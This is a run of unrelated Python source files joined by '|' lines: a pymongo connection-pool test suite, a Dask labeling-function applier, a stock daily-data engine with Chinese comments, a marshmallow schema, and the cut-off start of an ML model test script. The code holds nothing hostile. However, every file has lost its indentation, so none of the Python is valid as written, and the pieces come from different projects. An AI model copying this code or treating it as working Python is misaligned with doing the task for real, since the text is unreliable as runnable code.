TEST_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "cmap")
# Test operations:
def start(self, op):
"""Run the 'start' thread operation."""
target = op["target"]
thread = SpecRunnerThread(target)
thread.start()
self.targets[target] = thread
def wait(self, op):
"""Run the 'wait' operation."""
time.sleep(op["ms"] / 1000.0)
def wait_for_thread(self, op):
"""Run the 'waitForThread' operation."""
target = op["target"]
thread = self.targets[target]
thread.stop()
thread.join()
if thread.exc:
raise thread.exc
self.assertFalse(thread.ops)
def wait_for_event(self, op):
"""Run the 'waitForEvent' operation."""
event = OBJECT_TYPES[op["event"]]
count = op["count"]
timeout = op.get("timeout", 10000) / 1000.0
wait_until(
lambda: self.listener.event_count(event) >= count,
"find %s %s event(s)" % (count, event),
timeout=timeout,
)
def check_out(self, op):
"""Run the 'checkOut' operation."""
label = op["label"]
with self.pool.get_socket() as sock_info:
# Call 'pin_cursor' so we can hold the socket.
sock_info.pin_cursor()
if label:
self.labels[label] = sock_info
else:
self.addCleanup(sock_info.close_socket, None)
def check_in(self, op):
"""Run the 'checkIn' operation."""
label = op["connection"]
sock_info = self.labels[label]
self.pool.return_socket(sock_info)
def ready(self, op):
"""Run the 'ready' operation."""
self.pool.ready()
def clear(self, op):
"""Run the 'clear' operation."""
self.pool.reset()
def close(self, op):
"""Run the 'close' operation."""
self.pool.close()
def run_operation(self, op):
"""Run a single operation in a test."""
op_name = camel_to_snake(op["name"])
thread = op["thread"]
meth = getattr(self, op_name)
if thread:
self.targets[thread].schedule(lambda: meth(op))
else:
meth(op)
def run_operations(self, ops):
"""Run a test's operations."""
for op in ops:
self._ops.append(op)
self.run_operation(op)
def check_object(self, actual, expected):
"""Assert that the actual object matches the expected object."""
self.assertEqual(type(actual), OBJECT_TYPES[expected["type"]])
for attr, expected_val in expected.items():
if attr == "type":
continue
c2s = camel_to_snake(attr)
actual_val = getattr(actual, c2s)
if expected_val == 42:
self.assertIsNotNone(actual_val)
else:
self.assertEqual(actual_val, expected_val)
def check_event(self, actual, expected):
"""Assert that the actual event matches the expected event."""
self.check_object(actual, expected)
def actual_events(self, ignore):
"""Return all the non-ignored events."""
ignore = tuple(OBJECT_TYPES[name] for name in ignore)
return [event for event in self.listener.events if not isinstance(event, ignore)]
def check_events(self, events, ignore):
"""Check the events of a test."""
actual_events = self.actual_events(ignore)
for actual, expected in zip(actual_events, events):
self.logs.append("Checking event actual: %r vs expected: %r" % (actual, expected))
self.check_event(actual, expected)
if len(events) > len(actual_events):
self.fail("missing events: %r" % (events[len(actual_events) :],))
def check_error(self, actual, expected):
message = expected.pop("message")
self.check_object(actual, expected)
self.assertIn(message, str(actual))
def _set_fail_point(self, client, command_args):
cmd = SON([("configureFailPoint", "failCommand")])
cmd.update(command_args)
client.admin.command(cmd)
def set_fail_point(self, command_args):
if not client_context.supports_failCommand_fail_point:
self.skipTest("failCommand fail point must be supported")
self._set_fail_point(self.client, command_args)
def run_scenario(self, scenario_def, test):
"""Run a CMAP spec test."""
self.logs: list = []
self.assertEqual(scenario_def["version"], 1)
self.assertIn(scenario_def["style"], ["unit", "integration"])
self.listener = CMAPListener()
self._ops: list = []
# Configure the fail point before creating the client.
if "failPoint" in test:
fp = test["failPoint"]
self.set_fail_point(fp)
self.addCleanup(
self.set_fail_point, {"configureFailPoint": fp["configureFailPoint"], "mode": "off"}
)
opts = test["poolOptions"].copy()
opts["event_listeners"] = [self.listener]
opts["_monitor_class"] = DummyMonitor
opts["connect"] = False
# Support backgroundThreadIntervalMS, default to 50ms.
interval = opts.pop("backgroundThreadIntervalMS", 50)
if interval < 0:
kill_cursor_frequency = 99999999
else:
kill_cursor_frequency = interval / 1000.0
with client_knobs(kill_cursor_frequency=kill_cursor_frequency, min_heartbeat_interval=0.05):
client = single_client(**opts)
# Update the SD to a known type because the DummyMonitor will not.
# Note we cannot simply call topology.on_change because that would
# internally call pool.ready() which introduces unexpected
# PoolReadyEvents. Instead, update the initial state before
# opening the Topology.
td = client_context.client._topology.description
sd = td.server_descriptions()[(client_context.host, client_context.port)]
client._topology._description = updated_topology_description(
client._topology._description, sd
)
# When backgroundThreadIntervalMS is negative we do not start the
# background thread to ensure it never runs.
if interval < 0:
client._topology.open()
else:
client._get_topology()
self.addCleanup(client.close)
self.pool = list(client._topology._servers.values())[0].pool
# Map of target names to Thread objects.
self.targets: dict = dict()
# Map of label names to Connection objects
self.labels: dict = dict()
def cleanup():
for t in self.targets.values():
t.stop()
for t in self.targets.values():
t.join(5)
for conn in self.labels.values():
conn.close_socket(None)
self.addCleanup(cleanup)
try:
if test["error"]:
with self.assertRaises(PyMongoError) as ctx:
self.run_operations(test["operations"])
self.check_error(ctx.exception, test["error"])
else:
self.run_operations(test["operations"])
self.check_events(test["events"], test["ignore"])
except Exception:
# Print the events after a test failure.
print("\nFailed test: %r" % (test["description"],))
print("Operations:")
for op in self._ops:
print(op)
print("Threads:")
print(self.targets)
print("Connections:")
print(self.labels)
print("Events:")
for event in self.listener.events:
print(event)
print("Log:")
for log in self.logs:
print(log)
raise
POOL_OPTIONS = {
"maxPoolSize": 50,
"minPoolSize": 1,
"maxIdleTimeMS": 10000,
"waitQueueTimeoutMS": 10000,
}
#
# Prose tests. Numbers correspond to the prose test number in the spec.
#
def test_1_client_connection_pool_options(self):
client = rs_or_single_client(**self.POOL_OPTIONS)
self.addCleanup(client.close)
pool_opts = get_pool(client).opts
self.assertEqual(pool_opts.non_default_options, self.POOL_OPTIONS)
def test_2_all_client_pools_have_same_options(self):
client = rs_or_single_client(**self.POOL_OPTIONS)
self.addCleanup(client.close)
client.admin.command("ping")
# Discover at least one secondary.
if client_context.has_secondaries:
client.admin.command("ping", read_preference=ReadPreference.SECONDARY)
pools = get_pools(client)
pool_opts = pools[0].opts
self.assertEqual(pool_opts.non_default_options, self.POOL_OPTIONS)
for pool in pools[1:]:
self.assertEqual(pool.opts, pool_opts)
def test_3_uri_connection_pool_options(self):
opts = "&".join(["%s=%s" % (k, v) for k, v in self.POOL_OPTIONS.items()])
uri = "mongodb://%s/?%s" % (client_context.pair, opts)
client = rs_or_single_client(uri)
self.addCleanup(client.close)
pool_opts = get_pool(client).opts
self.assertEqual(pool_opts.non_default_options, self.POOL_OPTIONS)
def test_4_subscribe_to_events(self):
listener = CMAPListener()
client = single_client(event_listeners=[listener])
self.addCleanup(client.close)
self.assertEqual(listener.event_count(PoolCreatedEvent), 1)
# Creates a new connection.
client.admin.command("ping")
self.assertEqual(listener.event_count(ConnectionCheckOutStartedEvent), 1)
self.assertEqual(listener.event_count(ConnectionCreatedEvent), 1)
self.assertEqual(listener.event_count(ConnectionReadyEvent), 1)
self.assertEqual(listener.event_count(ConnectionCheckedOutEvent), 1)
self.assertEqual(listener.event_count(ConnectionCheckedInEvent), 1)
# Uses the existing connection.
client.admin.command("ping")
self.assertEqual(listener.event_count(ConnectionCheckOutStartedEvent), 2)
self.assertEqual(listener.event_count(ConnectionCheckedOutEvent), 2)
self.assertEqual(listener.event_count(ConnectionCheckedInEvent), 2)
client.close()
self.assertEqual(listener.event_count(PoolClearedEvent), 1)
self.assertEqual(listener.event_count(ConnectionClosedEvent), 1)
def test_5_check_out_fails_connection_error(self):
listener = CMAPListener()
client = single_client(event_listeners=[listener])
self.addCleanup(client.close)
pool = get_pool(client)
def mock_connect(*args, **kwargs):
raise ConnectionFailure("connect failed")
pool.connect = mock_connect
# Un-patch Pool.connect to break the cyclic reference.
self.addCleanup(delattr, pool, "connect")
# Attempt to create a new connection.
with self.assertRaisesRegex(ConnectionFailure, "connect failed"):
client.admin.command("ping")
self.assertIsInstance(listener.events[0], PoolCreatedEvent)
self.assertIsInstance(listener.events[1], PoolReadyEvent)
self.assertIsInstance(listener.events[2], ConnectionCheckOutStartedEvent)
self.assertIsInstance(listener.events[3], ConnectionCheckOutFailedEvent)
self.assertIsInstance(listener.events[4], PoolClearedEvent)
failed_event = listener.events[3]
self.assertEqual(failed_event.reason, ConnectionCheckOutFailedReason.CONN_ERROR)
def test_5_check_out_fails_auth_error(self):
listener = CMAPListener()
client = single_client_noauth(
username="notauser", password="fail", event_listeners=[listener]
)
self.addCleanup(client.close)
# Attempt to create a new connection.
with self.assertRaisesRegex(OperationFailure, "failed"):
client.admin.command("ping")
self.assertIsInstance(listener.events[0], PoolCreatedEvent)
self.assertIsInstance(listener.events[1], PoolReadyEvent)
self.assertIsInstance(listener.events[2], ConnectionCheckOutStartedEvent)
self.assertIsInstance(listener.events[3], ConnectionCreatedEvent)
# Error happens here.
self.assertIsInstance(listener.events[4], ConnectionClosedEvent)
self.assertIsInstance(listener.events[5], ConnectionCheckOutFailedEvent)
self.assertEqual(listener.events[5].reason, ConnectionCheckOutFailedReason.CONN_ERROR)
#
# Extra non-spec tests
#
def assertRepr(self, obj):
new_obj = eval(repr(obj))
self.assertEqual(type(new_obj), type(obj))
self.assertEqual(repr(new_obj), repr(obj))
def test_events_repr(self):
host = ("localhost", 27017)
self.assertRepr(ConnectionCheckedInEvent(host, 1))
self.assertRepr(ConnectionCheckedOutEvent(host, 1))
self.assertRepr(
ConnectionCheckOutFailedEvent(host, ConnectionCheckOutFailedReason.POOL_CLOSED)
)
self.assertRepr(ConnectionClosedEvent(host, 1, ConnectionClosedReason.POOL_CLOSED))
self.assertRepr(ConnectionCreatedEvent(host, 1))
self.assertRepr(ConnectionReadyEvent(host, 1))
self.assertRepr(ConnectionCheckOutStartedEvent(host))
self.assertRepr(PoolCreatedEvent(host, {}))
self.assertRepr(PoolClearedEvent(host))
self.assertRepr(PoolClearedEvent(host, service_id=ObjectId()))
self.assertRepr(PoolClosedEvent(host))
def test_close_leaves_pool_unpaused(self):
# Needed until we implement PYTHON-2463. This test is related to
# test_threads.TestThreads.test_client_disconnect
listener = CMAPListener()
client = single_client(event_listeners=[listener])
client.admin.command("ping")
pool = get_pool(client)
client.close()
self.assertEqual(1, listener.event_count(PoolClearedEvent))
self.assertEqual(PoolState.READY, pool.state)
# Checking out a connection should succeed
with pool.get_socket():
pass
def create_test(scenario_def, test, name):
def run_scenario(self):
self.run_scenario(scenario_def, test)
return run_scenario
class CMAPTestCreator(TestCreator):
def tests(self, scenario_def):
"""Extract the tests from a spec file.
CMAP tests do not have a 'tests' field. The whole file represents
a single test case.
"""
return [scenario_def]
test_creator = CMAPTestCreator(create_test, TestCMAP, TestCMAP.TEST_PATH)
test_creator.create_tests()
if __name__ == "__main__":
unittest.main()
|
from functools import partial
from typing import Union
import numpy as np
import pandas as pd
from dask import dataframe as dd
from dask.distributed import Client
from .core import BaseLFApplier, _FunctionCaller
from .pandas import apply_lfs_to_data_point, rows_to_triplets
Scheduler = Union[str, Client]
class DaskLFApplier(BaseLFApplier):
"""LF applier for a Dask DataFrame.
Dask DataFrames consist of partitions, each being a Pandas DataFrame.
This allows for efficient parallel computation over DataFrame rows.
For more information, see https://docs.dask.org/en/stable/dataframe.html
"""
def apply(
self,
df: dd.DataFrame,
scheduler: Scheduler = "processes",
fault_tolerant: bool = False,
) -> np.ndarray:
"""Label Dask DataFrame of data points with LFs.
Parameters
----------
df
Dask DataFrame containing data points to be labeled by LFs
scheduler
A Dask scheduling configuration: either a string option or
a ``Client``. For more information, see
https://docs.dask.org/en/stable/scheduling.html#
fault_tolerant
Output ``-1`` if LF execution fails?
Returns
-------
np.ndarray
Matrix of labels emitted by LFs
"""
f_caller = _FunctionCaller(fault_tolerant)
apply_fn = partial(apply_lfs_to_data_point, lfs=self._lfs, f_caller=f_caller)
map_fn = df.map_partitions(lambda p_df: p_df.apply(apply_fn, axis=1))
labels = map_fn.compute(scheduler=scheduler)
labels_with_index = rows_to_triplets(labels)
return self._numpy_from_row_data(labels_with_index)
class PandasParallelLFApplier(DaskLFApplier):
"""Parallel LF applier for a Pandas DataFrame.
Creates a Dask DataFrame from a Pandas DataFrame, then uses
``DaskLFApplier`` to label data in parallel. See ``DaskLFApplier``.
"""
def apply( # type: ignore
self,
df: pd.DataFrame,
n_parallel: int = 2,
scheduler: Scheduler = "processes",
fault_tolerant: bool = False,
) -> np.ndarray:
"""Label Pandas DataFrame of data points with LFs in parallel using Dask.
Parameters
----------
df
Pandas DataFrame containing data points to be labeled by LFs
n_parallel
Parallelism level for LF application. Corresponds to ``npartitions``
in constructed Dask DataFrame. For ``scheduler="processes"``, number
of processes launched. Recommended to be no more than the number
of cores on the running machine.
scheduler
A Dask scheduling configuration: either a string option or
a ``Client``. For more information, see
https://docs.dask.org/en/stable/scheduling.html#
fault_tolerant
Output ``-1`` if LF execution fails?
Returns
-------
np.ndarray
Matrix of labels emitted by LFs
"""
if n_parallel < 2:
raise ValueError(
"n_parallel should be >= 2. "
"For single process Pandas, use PandasLFApplier."
)
df = dd.from_pandas(df, npartitions=n_parallel)
return super().apply(df, scheduler=scheduler, fault_tolerant=fault_tolerant)
|
from DyCommon.DyCommon import *
from EventEngine.DyEvent import *
from ..DyStockDataCommon import *
from .Common.DyStockDataCommonEngine import *
class DyStockDataDaysEngine(object):
""" 股票(指数)历史日线数据,包含股票代码表和交易日数据 """
def __init__(self, eventEngie, mongoDbEngine, gateway, info, registerEvent=True):
self._eventEngine = eventEngie
self._mongoDbEngine = mongoDbEngine
self._gateway = gateway
self._info = info
self._commonEngine = DyStockDataCommonEngine(self._mongoDbEngine, self._gateway, self._info)
self._progress = DyProgress(self._info)
self._updatedCodeCount = 0 # 更新日线数据的计数器
self._codeDaysDf = {} # 股票的日线DataFrame
self._codeAdjFactors = {} # 股票的复权因子
if registerEvent:
self._registerEvent()
def _loadDays(self, startDate, endDate, indicators):
self._info.print('开始载入{0}只股票(指数,基金)的日线数据[{1}, {2}]...'.format(len(self.stockAllCodesFunds), startDate, endDate))
# init
self._codeDaysDf = {}
# 启用进度条显示
self._progress.init(len(self.stockAllCodesFunds), 100, 5)
for code, name in self.stockAllCodesFunds.items():
df = self._mongoDbEngine.getOneCodeDays(code, startDate, endDate, indicators, name)
if df is not None:
self._codeDaysDf[code] = df
self._progress.update()
self._info.print('股票(指数,基金)的日线数据载入完成')
return True
def _getDaysNotInDb(self, tradeDays, codes, indicators):
""" @tradeDays: [trade day]
@codes: {code: name}
@indicators: [indicator]
@return: {code: {indicator: [trade day]}}
"""
self._info.print('开始从数据库获取日线不存在的数据...')
self._progress.init(len(codes), 100)
data = {}
for code in codes:
temp = self._mongoDbEngine.getNotExistingDates(code, tradeDays, indicators)
if temp:
data[code] = temp
self._progress.update()
return data if data else None
def _updateHistDaysBasic(self, startDate, endDate):
"""
更新全部A股代码表,交易日数据及板块成分代码表
"""
return self._commonEngine.updateCodes() and self._commonEngine.updateTradeDays(startDate, endDate)# and self._commonEngine.updateAllSectorCodes(startDate, endDate)
def _getUpdatedCodes(self, startDate, endDate, indicators, isForced, codes=None):
"""
@return: {code: {indicator: [trade day]}}
"""
# get trade days
tradeDays = self._commonEngine.getTradeDays(startDate, endDate)
# get stock codes, including indexes and funds
codes = self.stockAllCodesFunds if codes is None else codes
# get not existing from DB
if not isForced:
codes = self._getDaysNotInDb(tradeDays, codes, indicators)
if not codes:
self._info.print("历史日线数据已经在数据库")
self._progress.init(0)
self._eventEngine.put(DyEvent(DyEventType.finish))
return None
else:
newCodes = {}
if tradeDays and indicators:
for code in codes:
newCodes[code] = {}
for indicator in indicators:
newCodes[code][indicator] = tradeDays
codes = newCodes
if not codes:
self._info.print("没有日线数据需要更新")
self._progress.init(0)
self._eventEngine.put(DyEvent(DyEventType.finish))
return None
return codes
def _updateHistDays(self, startDate, endDate, indicators, isForced=False, codes=None):
# get updated codes data info
codes = self._getUpdatedCodes(startDate, endDate, indicators, isForced, codes)
if codes is None: return
# init
self._isStopped = False
self._updatedCodeCount = 0
self._progress.init(len(codes), 10)
self._info.print("开始更新{0}只股票(指数,基金)的历史日线数据...".format(len(codes)))
# send for updating
event = DyEvent(DyEventType.updateStockHistDays_)
event.data = codes
self._eventEngine.put(event)
def _update(self, startDate, endDate, indicators, isForced=False, codes=None):
# update all stock A code table, trade day table and sector code table firstly
if not self._updateHistDaysBasic(startDate, endDate):
self._printCount()
self._eventEngine.put(DyEvent(DyEventType.fail))
return
# put event for 一键更新
event = DyEvent(DyEventType.stockDaysCommonUpdateFinish)
event.data['startDate'] = startDate
event.data['endDate'] = endDate
self._eventEngine.put(event)
# 更新日线数据
self._updateHistDays(startDate, endDate, indicators, isForced, codes)
def _autoUpdate(self):
# get latest date from DB
latestDate = self._commonEngine.getLatestDateInDb()
if latestDate is None:
self._info.print("数据库里没有日线数据", DyLogData.error)
self._eventEngine.put(DyEvent(DyEventType.fail))
return
# 贪婪法获得最大的更新结束日期
endDate = datetime.now().strftime("%Y-%m-%d")
# check if now is after trading time
ret = self._gateway.isNowAfterTradingTime()
if ret is None: # error
self._eventEngine.put(DyEvent(DyEventType.fail))
return
if ret is False: # now is trade day and before end of trading time
self._info.print("今天是交易日, 请18:00后更新今日日线数据", DyLogData.error)
self._eventEngine.put(DyEvent(DyEventType.fail))
return
startDate = DyTime.getDateStr(latestDate, 1) # next date after latest date in DB
# compare dates
if endDate < startDate:
# update progress UI
self._progress.init(0)
self._info.print("数据库日线数据已经是最新", DyLogData.ind)
self._eventEngine.put(DyEvent(DyEventType.finish))
return
self._update(startDate, endDate, DyStockDataCommon.dayIndicators)
def _updateStockHistDaysHandler(self, event):
self._progress.reset()
if event.data is None:
self._autoUpdate()
else:
# unpack
startDate = event.data['startDate']
endDate = event.data['endDate']
indicators = event.data['indicators'] # list
isForced = event.data['forced']
codes = event.data['codes'] if 'codes' in event.data else None
# update
self._update(startDate, endDate, indicators, isForced, codes)
def _stopReqHandler(self, event):
self._isStopped = True
def _updateStockSectorCodesHandler(self, event):
sectorCodeList = event.data['sectorCode']
startDate = event.data['startDate']
endDate = event.data['endDate']
self._progress.reset()
for sectorCode in sectorCodeList:
if not self._commonEngine.updateSectorCodes(sectorCode, startDate, endDate):
self._eventEngine.put(DyEvent(DyEventType.fail))
return
self._eventEngine.put(DyEvent(DyEventType.finish))
def _updateOneCode(self, code, data):
# get max date range
startDate, endDate = None, None
for _, dates in data.items():
if startDate is None:
startDate = dates[0]
endDate = dates[-1]
else:
if operator.lt(dates[0], startDate):
startDate = dates[0]
if operator.gt(dates[-1], endDate):
endDate = dates[-1]
# get from Gateway
data = self._gateway.getDays(code, startDate, endDate, sorted(data), self.stockAllCodesFunds[code])
if not data: # None(errors) or no data
if data is None: # indicate fetching data error from engine point of view
self._info.print("¥DyStockDataDaysEngine¥: 获取{}({})日线数据[{}, {}]失败".format(code, self.stockAllCodesFunds[code], startDate, endDate), DyLogData.error)
return
# updat to DB
if self._mongoDbEngine.updateDays(code, data):
self._updatedCodeCount += 1 # 需要更新的股票(也就是在数据库里的数据不全),并且数据成功写入数据库
def _printCount(self):
self._info.print('由于股票停牌或者没有上市, 更新了{0}只股票(指数,基金)日线数据'.format(self._updatedCodeCount), DyLogData.ind)
def _updateStockHistDays_Handler(self, event):
# unpack
codes = event.data
# check stop flag firstly
if self._isStopped:
self._printCount()
self._eventEngine.put(DyEvent(DyEventType.stopAck))
return
# update one code each time
code = sorted(codes)[0]
self._updateOneCode(code, codes[code])
# update progress
self._progress.update()
# delete updated code
del codes[code]
if not codes: # all codes are are updated
self._printCount()
self._eventEngine.put(DyEvent(DyEventType.finish))
return
# send for next updating
event = DyEvent(DyEventType.updateStockHistDays_)
event.data = codes
self._eventEngine.put(event)
def _loadCommon(self, dates, codes):
if not self._commonEngine.load(dates, codes):
return None, None
return self._commonEngine.tOldestDay(), self._commonEngine.tLatestDay()
def _loadAdjFactors(self, date, latestAdjFactorInDb):
""" 载入@date的复权因子"""
self._info.print('开始载入复权因子...')
# init
self._codeAdjFactors = {}
if latestAdjFactorInDb: # 获取数据库里日线数据的最新复权因子
date = self._commonEngine.getLatestTradeDayInDb()
if date is None: return False
# init progress
self._progress.init(len(self._codeDaysDf), 100, 10)
# 载入复权因子, 基于载入的日线数据
for code, _ in self._codeDaysDf.items():
adjFactor = self._mongoDbEngine.getAdjFactor(code, date, self.stockAllCodesFunds[code])
if adjFactor is not None:
self._codeAdjFactors[code] = adjFactor
else:
self._info.print('{0}:{1}复权因子缺失[{2}]'.format(code, self.stockAllCodesFunds[code], date), DyLogData.warning)
self._progress.update()
self._info.print('复权因子载入完成')
return True
def _processAdj(self):
""" 前复权 """
self._info.print("开始前复权...")
self._progress.init(len(self._codeDaysDf), 100, 20)
for code, df in self._codeDaysDf.items():
# 复权因子变换
adjFactor = df['adjfactor']/self._codeAdjFactors[code]
adjFactor = adjFactor.values.reshape((adjFactor.shape[0], 1))
# 价格相关
prices = df[['open', 'high', 'low', 'close']].values
df[['open', 'high', 'low', 'close']] = prices * adjFactor
# 成交量
df[['volume']] = df[['volume']].values / adjFactor
self._progress.update()
self._info.print("前复权完成")
def _unionDates(self, startDate, endDate, dates):
for date in dates:
if isinstance(date, str):
if operator.lt(date, startDate):
startDate = date
if operator.gt(date, endDate):
endDate = date
return startDate, endDate
def _loadOneCodeDays(self, code, dates, indicators):
"""
载入个股日线数据,个股对应的指数数据也被载入
个股上市可能早于指数
"""
# 载入个股日线数据
df = self._mongoDbEngine.getOneCodeDaysUnified(code, dates, indicators, self.stockAllCodesFundsSectors[code])
if df is None:
return None, None
# init
self._codeDaysDf = {}
# set stock DF
self._codeDaysDf[code] = df
# new days
startDay = df.index[0].strftime("%Y-%m-%d")
endDay = df.index[-1].strftime("%Y-%m-%d")
# 载入对应的指数日线数据
index = self.getIndex(code)
df = self._mongoDbEngine.getOneCodeDays(index, startDay, endDay, indicators, self.stockIndexes[index])
#!!! 个股上市可能早于指数
if df is not None:
self._codeDaysDf[index] = df
# 获取日期并集for trade days loading
return self._unionDates(startDay, endDay, dates)
def _registerEvent(self):
self._eventEngine.register(DyEventType.updateStockHistDays, self._updateStockHistDaysHandler, DyStockDataEventHandType.daysEngine)
self._eventEngine.register(DyEventType.updateStockHistDays_, self._updateStockHistDays_Handler, DyStockDataEventHandType.daysEngine)
self._eventEngine.register(DyEventType.stopUpdateStockHistDaysReq, self._stopReqHandler, DyStockDataEventHandType.daysEngine)
self._eventEngine.register(DyEventType.updateStockSectorCodes, self._updateStockSectorCodesHandler, DyStockDataEventHandType.daysEngine)
####################################################
# -------------------- 公共接口 --------------------
####################################################
def test(self):
pass
def tDaysOffset(self, base, n=0):
return self._commonEngine.tDaysOffset(base, n)
def tDays(self, start, end):
return self._commonEngine.tDays(start, end)
def tLatestDay(self):
return self._commonEngine.tLatestDay()
def tLatestDayInDb(self):
return self._commonEngine.getLatestTradeDayInDb()
def tDaysCountInDb(self, start, end):
return self._commonEngine.tDaysCountInDb(start, end)
def tDaysOffsetInDb(self, base, n=0):
return self._commonEngine.tDaysOffsetInDb(base, n)
def codeTDayOffset(self, code, baseDate, n=0, strict=True):
""" 根据偏移获取个股的交易日
@strict: 严格方式,非严格方式,则获取股票在数据库里的最大偏移
"""
return self._mongoDbEngine.codeTDayOffset(code, baseDate, n, strict)
def getCode(self, name):
"""
根据股票名称获取股票代码
"""
return self._commonEngine.getCode(name)
@property
def shIndex(self):
return self._commonEngine.shIndex
@property
def szIndex(self):
return self._commonEngine.szIndex
@property
def cybIndex(self):
return self._commonEngine.cybIndex
@property
def zxbIndex(self):
return self._commonEngine.zxbIndex
@property
def etf50(self):
return self._commonEngine.etf50
@property
def etf300(self):
return self._commonEngine.etf300
@property
def etf500(self):
return self._commonEngine.etf500
@property
def stockFunds(self):
return self._commonEngine.stockFunds
@property
def stockCodesFunds(self):
return self._commonEngine.stockCodesFunds
@property
def stockAllCodesFunds(self):
return self._commonEngine.stockAllCodesFunds
@property
def stockAllCodesFundsSectors(self):
return self._commonEngine.stockAllCodesFundsSectors
@property
def stockCodes(self):
return self._commonEngine.stockCodes
@property
def stockAllCodes(self):
return self._commonEngine.stockAllCodes
@property
def stockIndexes(self):
"""
大盘指数
"""
return self._commonEngine.stockIndexes
@property
def stockIndexesSectors(self):
"""
大盘指数和板块指数
"""
return self._commonEngine.stockIndexesSectors
def getIndex(self, code):
"""
获取个股对应的大盘指数
"""
return self._commonEngine.getIndex(code)
def getIndexStockCodes(self, index=None):
"""
获取大盘指数包含的股票代码表
"""
return self._commonEngine.getIndexStockCodes(index)
def getIndexSectorStockCodes(self, index=None):
"""
获取大盘指数或者板块指数包含的股票代码表
"""
return self._commonEngine.getIndexSectorStockCodes(index)
def loadCodeTable(self, codes=None):
return self._commonEngine.loadCodeTable(codes)
def loadSectorCodeTable(self, sectorCode, date, codes=None):
"""
载入板块的成份股代码表
"""
return self._commonEngine.loadSectorCodeTable(sectorCode, date, codes)
def getSectorCodes(self, sectorCode):
"""
获取板块的成份股代码表
call after @loadSectorCodeTable
@return: {code: name}
"""
return self._commonEngine.getSectorCodes(sectorCode)
def loadTradeDays(self, dates):
return self._commonEngine.loadTradeDays(dates)
def loadCommon(self, dates, codes=None):
return self._commonEngine.load(dates, codes)
def getStockMarketDate(self, code, name=None):
return self._mongoDbEngine.getStockMarketDate(code, name)
def loadCode(self, code, dates, indicators=DyStockDataCommon.dayIndicators, latestAdjFactorInDb=True):
"""
以个股(基金)在数据库里的数据加载日线数据。个股对应的指数数据默认载入
@dates: 类型是list,有如下几种模式:
[startDate, endDate]
[baseDate, (+/-)n] 负数是向前,正数向后
[startDate, baseDate, +n]
[-n, baseDate, +n]
[-n, startDate, endDate]
@latestAdjFactorInDb: True - 基于数据库最新复权因子前复权,一般用于选股分析和回归
False - 基于end day的复权因子前复权,一般用于实盘回测
"""
# 载入股票代码表
if not self.loadCodeTable([code]):
self._info.print('载入[{0}]股票代码表失败'.format(code), DyLogData.error)
return False
# 载入股票日线数据
startDay, endDay = self._loadOneCodeDays(code, dates, indicators)
if startDay is None:
self._info.print('载入[{0}:{1}]日线数据失败{2}'.format(code, self.stockAllCodesFundsSectors[code], dates), DyLogData.error)
return False
# 载入交易日数据
if not self.loadTradeDays([startDay, endDay]):
self._info.print('载入交易日数据失败', DyLogData.error)
return False
# 载入复权因子
if not self._loadAdjFactors(endDay, latestAdjFactorInDb):
self._info.print('载入复权因子失败', DyLogData.error)
return False
# 前复权
self._processAdj()
return True
def load(self, dates, indicators=DyStockDataCommon.dayIndicators, latestAdjFactorInDb=True, codes=None):
"""
基于交易日数据,载入股票(基金)日线数据。总是载入指数日线数据。
@dates: 类型是list,有如下几种模式:
[startDate, endDate]
[baseDate, (+/-)n] 负数是向前,正数向后
[startDate, baseDate, +n]
[-n, baseDate, +n]
[-n, startDate, endDate]
@latestAdjFactorInDb: True - 基于数据库最新复权因子前复权,一般用于选股分析和回归
False - 基于end day的复权因子前复权,一般用于实盘回测
@codes: [code], 股票代码,指数数据默认载入。None-载入所有股票(基金)日线数据,[]-只载入指数数据。
"""
# 载入公共数据
startDay, endDay = self._loadCommon(dates, codes)
if startDay is None:
self._info.print('DyStockDataEngine._loadCommon: 载入数据失败', DyLogData.error)
return False
# 载入日线数据
if not self._loadDays(startDay, endDay, indicators):
self._info.print('DyStockDataEngine._loadDays: 载入数据失败', DyLogData.error)
return False
# 载入复权因子
if not self._loadAdjFactors(endDay, latestAdjFactorInDb):
self._info.print('DyStockDataEngine._loadAdjFactors: 载入数据失败', DyLogData.error)
return False
# 前复权
self._processAdj()
return True
def getDataFrame(self, code, date=None, n=None):
df = self._codeDaysDf.get(code)
if df is None:
return None
if date is None:
return df
if isinstance(n, int):
# convert to absloute dates
endDay = self.tDaysOffset(date, 0)
startDay = self.tDaysOffset(date, n)
if n > 0:
startDay, endDay = endDay, startDay
else:
startDay, endDay = self.tDaysOffset(date, 0), n
# !!!当只有一行数据的时候,会导致环切切不到
retDf = None
if df.shape[0] == 1:
if startDay == endDay and startDay in df.index:
retDf = df
if retDf is None:
retDf = df[startDay:endDay]
return retDf
def isExisting(self, code, date):
if code not in self._codeDaysDf:
return False
try:
self._codeDaysDf[code].ix[date]
except Exception as ex:
return False
return True
|
""" Generic common schemas """
from marshmallow import Schema, fields
class IdSchema(Schema):
""" Simple ID schema """
id = fields.Integer()
|
import shutil
import os
import random
import numpy as np
from tensorflow import random as tf_random
import yaml
from pathlib import Path
from datetime import datetime
import pytz
import git
from gcp_utils import copy_folder_locally_if_missing
from image_utils import ImagesAndMasksGenerator
from models import generate_compiled_segmentation_model
from metrics_utils import global_threshold
from local_utils import local_folder_has_files, getSystemInfo, getLibVersions
# test can be run multiple times (with or without optimized thresholds, global thresholds), create new each time
test_datetime = datetime.now(pytz.UTC).strftime('%Y%m%dT%H%M%SZ')
metadata_file_name = 'metadata_' + test_datetime + '.yaml'
tmp_directory = Path('./tmp')
def test(gcp_bucket, dataset_id, model_id, batch_size, trained_thresholds_id, random_module_global_seed,
numpy_random_global_seed, tf_random_global_seed, message):
# seed global random generators if specified; global random seeds here must be int or default None (no seed given)
if random_module_global_seed is not None:
random.seed(random_module_global_seed)
if numpy_random_global_seed is not None:
np.random.seed(numpy_random_global_seed)
if tf_random_global_seed is not None:
tf_random.set_seed(tf_random_global_seed)
start_dt = datetime.now()
assert "gs://" in gcp_bucket
# clean up the tmp directory
try:
shutil.rmtree(tmp_directory.as_posix())
except FileNotFoundError:
pass
tmp_directory.mkdir()
local_dataset_dir = Path(tmp_directory, 'datasets')
local_model_dir = Path(tmp_directory, 'models')
copy_folder_locally_if_missing(os.path.join(gcp_bucket, 'datasets', dataset_id), local_dataset_dir)
local_folder_has_files(local_dataset_dir, dataset_id)
copy_folder_locally_if_missing(os.path.join(gcp_bucket, 'models', model_id), local_model_dir)
local_folder_has_files(local_model_dir, model_id)
test_id = "{}_{}".format(model_id, dataset_id)
test_dir = Path(tmp_directory, 'tests', test_id)
test_dir.mkdir(parents=True)
with Path(local_dataset_dir, dataset_id, 'config.yaml').open('r') as f:
